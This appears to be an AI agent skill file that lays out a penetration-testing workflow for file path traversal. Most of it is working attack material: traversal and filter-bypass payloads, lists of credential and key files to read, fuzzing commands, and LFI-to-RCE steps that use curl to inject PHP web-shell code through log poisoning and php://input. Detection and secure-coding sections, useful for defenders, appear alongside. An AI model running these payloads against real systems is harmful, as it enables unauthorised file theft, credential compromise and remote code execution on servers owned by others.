file-path-traversal

File Path Traversal Testing

Purpose

Identify and exploit file path traversal (directory traversal) vulnerabilities that allow attackers to read arbitrary files on the server, potentially including sensitive configuration files, credentials, and source code. This vulnerability occurs when user-controllable input is passed to filesystem APIs without proper validation.

Prerequisites

Required Tools

  • Web browser with developer tools
  • Burp Suite or OWASP ZAP
  • cURL for testing payloads
  • Wordlists for automation
  • ffuf or wfuzz for fuzzing

Required Knowledge

  • HTTP request/response structure
  • Linux and Windows filesystem layout
  • Web application architecture
  • Basic understanding of file APIs

Outputs and Deliverables

  1. Vulnerability Report - Identified traversal points and severity
  2. Exploitation Proof - Extracted file contents
  3. Impact Assessment - Accessible files and data exposure
  4. Remediation Guidance - Secure coding recommendations

Core Workflow

Phase 1: Understanding Path Traversal

Path traversal occurs when applications use user input to construct file paths:

```php
// Vulnerable PHP code example
$template = "blue.php";
if (isset($_COOKIE['template']) && !empty($_COOKIE['template'])) {
    $template = $_COOKIE['template'];
}
include("/home/user/templates/" . $template);
```

Attack principle:
  • `../` sequence moves up one directory
  • Chain multiple sequences to reach root
  • Access files outside intended directory

Impact:
  • Confidentiality - Read sensitive files
  • Integrity - Write/modify files (in some cases)
  • Availability - Delete files (in some cases)
  • Code Execution - If combined with file upload or log poisoning

Phase 2: Identifying Traversal Points

Map application for potential file operations:

```bash
# Parameters that often handle files
?file=      ?path=      ?page=      ?template=  ?filename=
?doc=       ?document=  ?folder=    ?dir=       ?include=
?src=       ?source=    ?content=   ?view=      ?download=
?load=      ?read=      ?retrieve=
```

Common vulnerable functionality:
- Image loading: `/image?filename=23.jpg`
- Template selection: `?template=blue.php`
- File downloads: `/download?file=report.pdf`
- Document viewers: `/view?doc=manual.pdf`
- Include mechanisms: `?page=about`

Phase 3: Basic Exploitation Techniques

Simple Path Traversal

```bash
# Basic Linux traversal
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd

# Windows traversal
..\..\..\windows\win.ini
..\..\..\..\windows\system32\drivers\etc\hosts

# URL encoded
..%2F..%2F..%2Fetc%2Fpasswd
..%252F..%252F..%252Fetc%252Fpasswd   # Double encoding

# Test payloads with curl
```

Absolute Path Injection

```bash
# Direct absolute path (Linux)
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ

# Direct absolute path (Windows)
C:\windows\win.ini
C:\windows\system32\drivers\etc\hosts
C:\boot.ini
```

Phase 4: Bypass Techniques

Bypass Stripped Traversal Sequences

```bash
# When ../ is stripped once
....//....//....//etc/passwd
..../..../..../etc/passwd

# Nested traversal
..././..././..././etc/passwd
....//....//etc/passwd

# Mixed encoding
..%2f..%2f..%2fetc/passwd
%2e%2e/%2e%2e/%2e%2e/etc/passwd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
```

Bypass Extension Validation

```bash
# Null byte injection (older PHP versions)
../../../etc/passwd%00.jpg
../../../etc/passwd%00.png

# Path truncation
../../../etc/passwd...............................

# Double extension
../../../etc/passwd.jpg.php
```

Bypass Base Directory Validation

```bash
# When path must start with expected directory
/var/www/images/../../../etc/passwd

# Expected path followed by traversal
images/../../../etc/passwd
```

Bypass Blacklist Filters

```bash
# Unicode/UTF-8 encoding
..%c0%af..%c0%af..%c0%afetc/passwd
..%c1%9c..%c1%9c..%c1%9cetc/passwd

# Overlong UTF-8 encoding
%c0%2e%c0%2e%c0%af

# URL encoding variations
%2e%2e/
%2e%2e%5c
..%5c
..%255c

# Case variations (Windows)
....\....\etc\passwd
```
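From the detection side, the encoding variants listed in this phase are exactly what a WAF or log-review rule has to normalise before matching. The following Python routine is an added example (not part of the original skill): it percent-decodes repeatedly, maps the overlong UTF-8 forms above to ASCII, and flags traversal indicators in web access-log request lines. The log lines and the indicator names are constructed for this example.

```python
import re
from urllib.parse import unquote_to_bytes

# Overlong / malformed UTF-8 sequences from the bypass section; lenient decoders
# treat them as "/", "\" or ".", so map them to ASCII before matching.
OVERLONG = {b"\xc0\xaf": b"/", b"\xc1\x9c": b"\\", b"\xc0\xae": b".", b"\xc0\x2e": b"."}

PATTERNS = [  # indicator name -> pattern applied to the normalised request path
    ("dot-dot traversal", re.compile(rb"\.\.;?/")),   # ../  ..;/  ....//  ..\ (after normalising)
    ("sensitive file path", re.compile(
        rb"(?i)(^|[=/])(etc/(passwd|shadow)|proc/self/environ|windows/win\.ini)")),
    ("null byte", re.compile(rb"\x00")),
    ("php stream wrapper", re.compile(rb"(?i)\b(php|data|expect)://")),
]
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def normalize(raw: str, rounds: int = 3) -> bytes:
    """Percent-decode up to `rounds` times (defeats double/triple encoding),
    replace overlong UTF-8 forms and unify backslashes to forward slashes."""
    data = raw.encode("utf-8")
    for _ in range(rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    for seq, ascii_form in OVERLONG.items():
        data = data.replace(seq, ascii_form)
    return data.replace(b"\\", b"/")

def findings(request_path: str) -> list[str]:
    """Names of every traversal indicator present in one request path."""
    normalized = normalize(request_path)
    return [name for name, rx in PATTERNS if rx.search(normalized)]

def scan_log(log_text: str) -> list[tuple[str, list[str]]]:
    """Run findings() over each access-log line; return only flagged requests."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_LINE.search(line)
        if m and (found := findings(m.group(1))):
            hits.append((m.group(1), found))
    return hits

# Constructed sample access-log lines (not real traffic): one benign request,
# then the encoding variants from this phase, a wrapper, and a null byte.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /image?filename=23.jpg HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /image?filename=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1803
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /page?file=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 221
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /page?file=....//....//....//etc/passwd HTTP/1.1" 200 1803
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /page?file=..%c0%af..%c0%afetc/passwd HTTP/1.1" 500 0
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /page?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 3300
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /download?file=report.pdf%00.jpg HTTP/1.1" 200 9000
"""
```

Note that the 404 on the double-encoded request is still flagged: a failed attempt is the earliest signal that a parameter is being probed.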

Phase 5: Linux Target Files

High-value files to target:

```bash
# System files
/etc/passwd      # User accounts
/etc/shadow      # Password hashes (root only)
/etc/group       # Group information
/etc/hosts       # Host mappings
/etc/hostname    # System hostname
/etc/issue       # System banner

# SSH files
/root/.ssh/id_rsa            # Root private key
/root/.ssh/authorized_keys   # Authorized keys
/home/<user>/.ssh/id_rsa     # User private keys
/etc/ssh/sshd_config         # SSH configuration

# Web server files
/etc/apache2/apache2.conf
/etc/nginx/nginx.conf
/etc/apache2/sites-enabled/000-default.conf
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log

# Application files
/var/www/html/config.php
/var/www/html/wp-config.php
/var/www/html/.htaccess
/var/www/html/web.config

# Process information
/proc/self/environ   # Environment variables
/proc/self/cmdline   # Process command line
/proc/self/fd/0      # File descriptors
/proc/version        # Kernel version

# Common application configs
/etc/mysql/my.cnf
/etc/postgresql/*/postgresql.conf
/opt/lampp/etc/httpd.conf
```

Phase 6: Windows Target Files

Windows-specific targets:

```bash
# System files
C:\windows\win.ini
C:\windows\system.ini
C:\boot.ini
C:\windows\system32\drivers\etc\hosts
C:\windows\system32\config\SAM
C:\windows\repair\SAM

# IIS files
C:\inetpub\wwwroot\web.config
C:\inetpub\logs\LogFiles\W3SVC1\

# Configuration files
C:\xampp\apache\conf\httpd.conf
C:\xampp\mysql\data\mysql\user.MYD
C:\xampp\passwords.txt
C:\xampp\phpmyadmin\config.inc.php

# User files
C:\Users\<user>\.ssh\id_rsa
C:\Users\<user>\Desktop
C:\Documents and Settings\<user>\
```

Phase 7: Automated Testing

Using Burp Suite

1. Capture request with file parameter
2. Send to Intruder
3. Mark file parameter value as payload position
4. Load path traversal wordlist
5. Start attack
6. Filter responses by size/content for success

Using ffuf

```bash
# Basic traversal fuzzing
ffuf -u "http://target.com/image?filename=FUZZ" \
     -w /usr/share/wordlists/traversal.txt \
     -mc 200

# Fuzzing with encoding
ffuf -u "http://target.com/page?file=FUZZ" \
     -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
     -mc 200,500 -ac
```

Using wfuzz

```bash
# Traverse to /etc/passwd
wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt \
      --hc 404 \
      "http://target.com/index.php?file=FUZZ"

# With headers/cookies
wfuzz -c -z file,traversal.txt \
      -H "Cookie: session=abc123" \
      "http://target.com/load?path=FUZZ"
```

Phase 8: LFI to RCE Escalation

Log Poisoning

```bash
# Inject PHP code into logs
curl -A "<?php system(\$_GET['cmd']); ?>" http://target.com/

# Include Apache log file

# Include auth.log (SSH)
# First: ssh '<?php system($_GET["cmd"]); ?>'@target.com
```

Proc/self/environ

```bash
# Inject via User-Agent
curl -A "<?php system('id'); ?>" \
     "http://target.com/page?file=/proc/self/environ"

# With command parameter
curl -A "<?php system(\$_GET['c']); ?>" \
     "http://target.com/page?file=/proc/self/environ&c=whoami"
```

PHP Wrapper Exploitation

```bash
# php://filter - Read source code as base64

# php://input - Execute POST data as PHP
curl -X POST -d "<?php system('id'); ?>" \
     "http://target.com/page?file=php://input"

# data:// - Execute inline PHP

# expect:// - Execute system commands
```

Phase 9: Testing Methodology

Structured testing approach:

```bash
# Step 1: Identify potential parameters
# Look for file-related functionality

# Step 2: Test basic traversal
../../../etc/passwd

# Step 3: Test encoding variations
..%2F..%2F..%2Fetc%2Fpasswd
%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

# Step 4: Test bypass techniques
....//....//....//etc/passwd
..;/..;/..;/etc/passwd

# Step 5: Test absolute paths
/etc/passwd

# Step 6: Test with null bytes (legacy)
../../../etc/passwd%00.jpg

# Step 7: Attempt wrapper exploitation
php://filter/convert.base64-encode/resource=index.php

# Step 8: Attempt log poisoning for RCE
```

Phase 10: Prevention Measures

Secure coding practices:

```php
// PHP: Use basename() to strip any directory component from the name
$filename = basename($_GET['file']);
$path = "/var/www/files/" . $filename;

// PHP: Validate against a whitelist (strict comparison so that loosely
// equal values cannot match an allowed entry)
$allowed = ['report.pdf', 'manual.pdf', 'guide.pdf'];
if (in_array($_GET['file'], $allowed, true)) {
    include("/var/www/files/" . $_GET['file']);
}

// PHP: Canonicalize and verify base path
$base = "/var/www/files/";
$realBase = realpath($base);          // realpath() drops the trailing slash
$userPath = $base . $_GET['file'];
$realUserPath = realpath($userPath);  // false if the file does not exist

// Compare against the base plus a separator so that a sibling directory
// such as /var/www/files2 does not pass the prefix check
if ($realUserPath && strpos($realUserPath, $realBase . '/') === 0) {
    include($realUserPath);
}
```

```python
# Python: Use os.path.realpath() and validate
import os

def safe_file_access(base_dir, filename):
    # Resolve both paths to absolute, symlink-free form
    base = os.path.realpath(base_dir)
    file_path = os.path.realpath(os.path.join(base, filename))
    # Verify the file is within the base directory; compare against the base
    # plus a separator so that a sibling such as /var/www/files2 is rejected
    if file_path.startswith(base + os.sep):
        with open(file_path, 'r') as f:
            return f.read()
    raise Exception("Access denied")
```
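The snippets above show the shape of the fix; the following Python resolver is an added example (not from the original skill) that carries it further: it rejects null bytes and backslashes up front, resolves symlinks and `..` with realpath, and checks containment with os.path.commonpath rather than a string prefix. Its demo() builds a throwaway directory tree (names and payloads constructed here) and runs the payload shapes from this skill against the resolver.

```python
import os
import tempfile

class PathTraversalError(ValueError):
    """Raised when an untrusted name would resolve outside the base directory."""

def resolve_under(base_dir: str, user_name: str) -> str:
    """Map an untrusted file name onto a path guaranteed to lie inside base_dir,
    or raise PathTraversalError. Symlinks and '..' are resolved first; containment
    is then checked with commonpath, because a plain prefix test such as
    startswith('/var/www/files') would also accept /var/www/files2/secret."""
    if not user_name or "\x00" in user_name or "\\" in user_name:
        raise PathTraversalError("forbidden characters in file name")
    base = os.path.realpath(base_dir)
    # os.path.join discards base when user_name is absolute, so an absolute
    # payload such as /etc/passwd resolves to itself and fails containment.
    candidate = os.path.realpath(os.path.join(base, user_name))
    if candidate == base or os.path.commonpath([base, candidate]) != base:
        raise PathTraversalError(f"{user_name!r} escapes {base_dir}")
    if not os.path.isfile(candidate):
        raise PathTraversalError(f"{user_name!r} is not a regular file")
    return candidate

def read_under(base_dir: str, user_name: str) -> bytes:
    """Read a file through resolve_under(); the only file access an endpoint
    serving user-named files should perform."""
    with open(resolve_under(base_dir, user_name), "rb") as fh:
        return fh.read()

def demo() -> dict[str, str]:
    """Build a throwaway tree (constructed for this example) and try the payload
    shapes from this skill against it. Returns payload -> 'allowed' / 'denied'."""
    with tempfile.TemporaryDirectory() as root:
        base = os.path.join(root, "files")          # the intended directory
        os.makedirs(base)
        os.makedirs(os.path.join(root, "files2"))   # sibling with a shared prefix
        for rel in ("files/report.pdf", "files2/secret.txt", "outside.txt"):
            with open(os.path.join(root, rel), "w") as fh:
                fh.write("sample content")
        # A symlink inside base pointing outside it: caught by realpath()
        os.symlink(os.path.join(root, "outside.txt"), os.path.join(base, "link"))
        payloads = ["report.pdf", "../../../etc/passwd", "....//....//etc/passwd",
                    "/etc/passwd", "report.pdf\x00.jpg", "../files2/secret.txt",
                    "link", "."]
        results = {}
        for payload in payloads:
            try:
                read_under(base, payload)
                results[payload] = "allowed"
            except PathTraversalError:
                results[payload] = "denied"
        return results
```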

Quick Reference

Common Payloads

| Payload | Target |
|---|---|
| `../../../etc/passwd` | Linux password file |
| `..\..\..\..\windows\win.ini` | Windows INI file |
| `....//....//....//etc/passwd` | Bypass simple filter |
| `/etc/passwd` | Absolute path |
| `php://filter/convert.base64-encode/resource=config.php` | Source code |

Target Files

| OS | File | Purpose |
|---|---|---|
| Linux | `/etc/passwd` | User accounts |
| Linux | `/etc/shadow` | Password hashes |
| Linux | `/proc/self/environ` | Environment vars |
| Windows | `C:\windows\win.ini` | System config |
| Windows | `C:\boot.ini` | Boot config |
| Web | `wp-config.php` | WordPress DB creds |

Encoding Variants

| Type | Example |
|---|---|
| URL Encoding | `%2e%2e%2f` = `../` |
| Double Encoding | `%252e%252e%252f` = `../` |
| Unicode | `%c0%af` = `/` |
| Null Byte | `%00` |

Constraints and Limitations

Permission Restrictions

  • Cannot read files application user cannot access
  • Shadow file requires root privileges
  • Many files have restrictive permissions

Application Restrictions

  • Extension validation may limit file types
  • Base path validation may restrict scope
  • WAF may block common payloads

Testing Considerations

  • Respect authorized scope
  • Avoid accessing genuinely sensitive data
  • Document all successful access

Troubleshooting

| Problem | Solutions |
|---|---|
| No response difference | Try encoding, blind traversal, different files |
| Payload blocked | Use encoding variants, nested sequences, case variations |
| Cannot escalate to RCE | Check logs, PHP wrappers, file upload, session poisoning |

When to Use

This skill applies whenever the workflow or actions described in the overview need to be carried out.